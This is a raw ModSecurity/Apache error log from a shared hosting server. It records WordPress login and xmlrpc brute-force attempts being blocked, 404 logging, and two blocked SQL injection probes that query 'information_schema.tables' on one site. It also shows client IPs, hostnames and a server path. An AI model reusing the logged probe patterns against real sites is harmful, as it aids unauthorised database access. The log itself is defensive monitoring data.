[Tue May 26 17:26:20.502198 2026] [security2:error] [pid 882219:tid 882374] [client 223.235.98.214:31013] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKZJ8tTkZcqimiXcQG-QAAAJ4"]
[Tue May 26 17:26:20.575743 2026] [security2:error] [pid 882219:tid 882411] [client 91.238.181.19:34108] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKZJ8tTkZcqimiXcQG-AAAAMM"]
[Tue May 26 17:26:21.333581 2026] [security2:error] [pid 882219:tid 882386] [client 160.250.132.165:54002] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "glorodavionics.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKZZ8tTkZcqimiXcQHFAAAAKo"]
[Tue May 26 17:26:22.257202 2026] [security2:error] [pid 882219:tid 882349] [client 91.238.181.19:34120] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHKQAAAIU"]
[Tue May 26 17:26:22.362885 2026] [security2:error] [pid 882219:tid 882358] [client 45.148.10.204:36990] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHQAAAAI4"]
[Tue May 26 17:26:22.364824 2026] [security2:error] [pid 882219:tid 882384] [client 45.148.10.204:36986] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHQgAAAKg"]
[Tue May 26 17:26:22.368939 2026] [security2:error] [pid 882219:tid 882371] [client 45.148.10.204:37004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHQQAAAJs"]
[Tue May 26 17:26:22.371501 2026] [security2:error] [pid 882219:tid 882375] [client 45.148.10.204:36982] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHPwAAAJ8"]
[Tue May 26 17:26:22.371501 2026] [security2:error] [pid 882219:tid 882356] [client 45.148.10.204:37014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHRAAAAIw"]
[Tue May 26 17:26:22.394674 2026] [security2:error] [pid 882219:tid 882453] [client 45.148.10.204:37016] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHSAAAAO0"]
[Tue May 26 17:26:22.408818 2026] [security2:error] [pid 882219:tid 882411] [client 45.148.10.204:37026] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHSQAAAMM"]
[Tue May 26 17:26:22.824734 2026] [security2:error] [pid 882219:tid 882394] [client 45.148.10.204:36826] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHMQAAALI"]
[Tue May 26 17:26:22.826985 2026] [security2:error] [pid 882219:tid 882437] [client 45.148.10.204:36930] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHOgAAAN0"]
[Tue May 26 17:26:22.827677 2026] [security2:error] [pid 882219:tid 882408] [client 45.148.10.204:36958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHPAAAAMA"]
[Tue May 26 17:26:22.829343 2026] [security2:error] [pid 882219:tid 882365] [client 45.148.10.204:36886] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHNwAAAJU"]
[Tue May 26 17:26:22.829609 2026] [security2:error] [pid 882219:tid 882444] [client 45.148.10.204:36896] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHOAAAAOQ"]
[Tue May 26 17:26:22.836556 2026] [security2:error] [pid 882219:tid 882393] [client 45.148.10.204:36972] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHPgAAALE"]
[Tue May 26 17:26:22.836567 2026] [security2:error] [pid 882219:tid 882396] [client 45.148.10.204:36844] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHMAAAALQ"]
[Tue May 26 17:26:23.091545 2026] [security2:error] [pid 882219:tid 882428] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHUgAAANQ"]
[Tue May 26 17:26:23.294210 2026] [security2:error] [pid 882219:tid 882460] [client 160.250.132.165:54997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "gulfviewcreations.ca.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKZ58tTkZcqimiXcQHagAAAPQ"]
[Tue May 26 17:26:23.369731 2026] [security2:error] [pid 882219:tid 882447] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHYgAAAOc"]
[Tue May 26 17:26:23.442660 2026] [security2:error] [pid 882219:tid 882413] [client 45.148.10.204:36836] ModSecurity: Warning. Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHLwAAAMU"]
[Tue May 26 17:26:23.442693 2026] [security2:error] [pid 882219:tid 882413] [client 45.148.10.204:36836] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHLwAAAMU"]
[Tue May 26 17:26:23.444698 2026] [security2:error] [pid 882219:tid 882434] [client 45.148.10.204:36806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHLQAAANo"]
[Tue May 26 17:26:23.447804 2026] [security2:error] [pid 882219:tid 882403] [client 45.148.10.204:36890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHNgAAALs"]
[Tue May 26 17:26:23.450182 2026] [security2:error] [pid 882219:tid 882390] [client 45.148.10.204:36858] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHNAAAAK4"]
[Tue May 26 17:26:23.465204 2026] [security2:error] [pid 882219:tid 882438] [client 45.148.10.204:36870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHMwAAAN4"]
[Tue May 26 17:26:24.123235 2026] [security2:error] [pid 882219:tid 882461] [client 190.101.249.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWKaJ8tTkZcqimiXcQHfQAAAPU"]
[Tue May 26 17:26:24.124315 2026] [security2:error] [pid 882219:tid 882425] [client 190.101.249.160:38076] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWKZ58tTkZcqimiXcQHeAAAANE"]
[Tue May 26 17:26:24.211927 2026] [security2:error] [pid 882219:tid 882391] [client 45.148.10.204:36846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHNQAAAK8"]
[Tue May 26 17:26:24.213725 2026] [security2:error] [pid 882219:tid 882421] [client 45.148.10.204:36848] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHMgAAAM0"]
[Tue May 26 17:26:24.213728 2026] [security2:error] [pid 882219:tid 882381] [client 45.148.10.204:36918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHOwAAAKU"]
[Tue May 26 17:26:24.213795 2026] [security2:error] [pid 882219:tid 882418] [client 45.148.10.204:36904] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHOQAAAMo"]
[Tue May 26 17:26:24.214739 2026] [security2:error] [pid 882219:tid 882427] [client 45.148.10.204:36942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHPQAAANM"]
[Tue May 26 17:26:24.215233 2026] [security2:error] [pid 882219:tid 882410] [client 45.148.10.204:36810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahWKZp8tTkZcqimiXcQHLgAAAMI"]
[Tue May 26 17:26:24.536088 2026] [security2:error] [pid 882219:tid 882373] [client 91.238.181.19:34130] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKaJ8tTkZcqimiXcQHhAAAAJ0"]
[Tue May 26 17:26:24.959191 2026] [core:crit] [pid 882219:tid 882371] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:26:25.039713 2026] [security2:error] [pid 882219:tid 882376] [client 160.250.132.165:55931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "grupo2g.mx.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKaZ8tTkZcqimiXcQHmgAAAKA"]
[Tue May 26 17:26:25.781379 2026] [security2:error] [pid 882219:tid 882475] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKaZ8tTkZcqimiXcQHpgAAAQM"]
[Tue May 26 17:26:26.510811 2026] [security2:error] [pid 882219:tid 882396] [client 91.238.181.19:34138] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKap8tTkZcqimiXcQHwwAAALQ"]
[Tue May 26 17:26:27.063932 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:58561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKap8tTkZcqimiXcQH0QAAAL4"]
[Tue May 26 17:26:27.064080 2026] [security2:error] [pid 882219:tid 882406] [client 203.194.101.7:58561] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKap8tTkZcqimiXcQH0QAAAL4"]
[Tue May 26 17:26:27.215767 2026] [security2:error] [pid 882219:tid 882388] [client 160.250.132.165:57059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWKa58tTkZcqimiXcQH1wAAAKw"]
[Tue May 26 17:26:27.264386 2026] [security2:error] [pid 882219:tid 882465] [client 186.65.114.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKa58tTkZcqimiXcQH1gAAAPk"], referer: https://www.anujtradingco.com/
[Tue May 26 17:26:28.048879 2026] [security2:error] [pid 882219:tid 882453] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKa58tTkZcqimiXcQH4wAAAO0"]
[Tue May 26 17:26:28.120446 2026] [security2:error] [pid 882219:tid 882394] [client 91.238.181.19:34148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKbJ8tTkZcqimiXcQH6gAAALI"]
[Tue May 26 17:26:28.145276 2026] [security2:error] [pid 882219:tid 882404] [client 186.65.114.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKbJ8tTkZcqimiXcQH7QAAALw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 17:26:28.276275 2026] [security2:error] [pid 882219:tid 882421] [client 31.57.184.107:50660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWKbJ8tTkZcqimiXcQH7gAAAM0"], referer: https://t.co/
[Tue May 26 17:26:28.653646 2026] [security2:error] [pid 882219:tid 882442] [client 31.57.184.107:51768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWKbJ8tTkZcqimiXcQH-AAAAOI"]
[Tue May 26 17:26:29.293887 2026] [security2:error] [pid 882219:tid 882471] [client 160.250.132.165:58159] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wp-login.php"] [unique_id "ahWKbZ8tTkZcqimiXcQIBQAAAP8"]
[Tue May 26 17:26:29.872026 2026] [security2:error] [pid 882219:tid 882447] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKbZ8tTkZcqimiXcQIDgAAAOc"]
[Tue May 26 17:26:29.922782 2026] [security2:error] [pid 882219:tid 882451] [client 91.238.181.19:44706] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKbZ8tTkZcqimiXcQIJQAAAOs"]
[Tue May 26 17:26:30.020347 2026] [security2:error] [pid 882219:tid 882451] [client 91.238.181.19:44706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKbZ8tTkZcqimiXcQIJQAAAOs"]
[Tue May 26 17:26:30.071097 2026] [security2:error] [pid 882219:tid 882472] [client 31.57.184.107:52141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWKbp8tTkZcqimiXcQIKwAAAQA"]
[Tue May 26 17:26:30.189759 2026] [security2:error] [pid 882219:tid 882418] [client 186.65.114.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKbp8tTkZcqimiXcQILgAAAMo"], referer: https://anujtradingco.com
[Tue May 26 17:26:31.005140 2026] [security2:error] [pid 882219:tid 882464] [client 223.235.98.214:12596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKb58tTkZcqimiXcQIQAAAAPg"]
[Tue May 26 17:26:31.005261 2026] [security2:error] [pid 882219:tid 882464] [client 223.235.98.214:12596] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKb58tTkZcqimiXcQIQAAAAPg"]
[Tue May 26 17:26:31.110790 2026] [security2:error] [pid 882219:tid 882373] [client 160.250.132.165:59140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.jiffystacks.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKb58tTkZcqimiXcQISAAAAJ0"]
[Tue May 26 17:26:31.852818 2026] [security2:error] [pid 882219:tid 882405] [client 91.238.181.19:44714] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKb58tTkZcqimiXcQIWwAAAL0"]
[Tue May 26 17:26:31.947280 2026] [security2:error] [pid 882219:tid 882405] [client 91.238.181.19:44714] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKb58tTkZcqimiXcQIWwAAAL0"]
[Tue May 26 17:26:32.836259 2026] [security2:error] [pid 882219:tid 882459] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKcJ8tTkZcqimiXcQIbQAAAPM"]
[Tue May 26 17:26:32.942508 2026] [security2:error] [pid 882219:tid 882436] [client 160.250.132.165:60105] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rokartech.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKcJ8tTkZcqimiXcQIfwAAANw"]
[Tue May 26 17:26:33.853304 2026] [security2:error] [pid 882219:tid 882360] [client 91.238.181.19:44732] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKcZ8tTkZcqimiXcQIkwAAAJA"]
[Tue May 26 17:26:34.682899 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKcp8tTkZcqimiXcQIoAAAAJk"]
[Tue May 26 17:26:34.743425 2026] [security2:error] [pid 882219:tid 882474] [client 160.250.132.165:61065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "acecomputers.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKcp8tTkZcqimiXcQIrwAAAQI"]
[Tue May 26 17:26:34.815191 2026] [security2:error] [pid 882219:tid 882264] [remote 94.76.235.103:34558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWKcp8tTkZcqimiXcQIpgAA7Sw"]
[Tue May 26 17:26:35.561256 2026] [security2:error] [pid 882219:tid 882388] [client 91.238.181.19:44758] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKc58tTkZcqimiXcQIvwAAAKw"]
[Tue May 26 17:26:36.822767 2026] [security2:error] [pid 882219:tid 882452] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKdJ8tTkZcqimiXcQI0gAAAOw"]
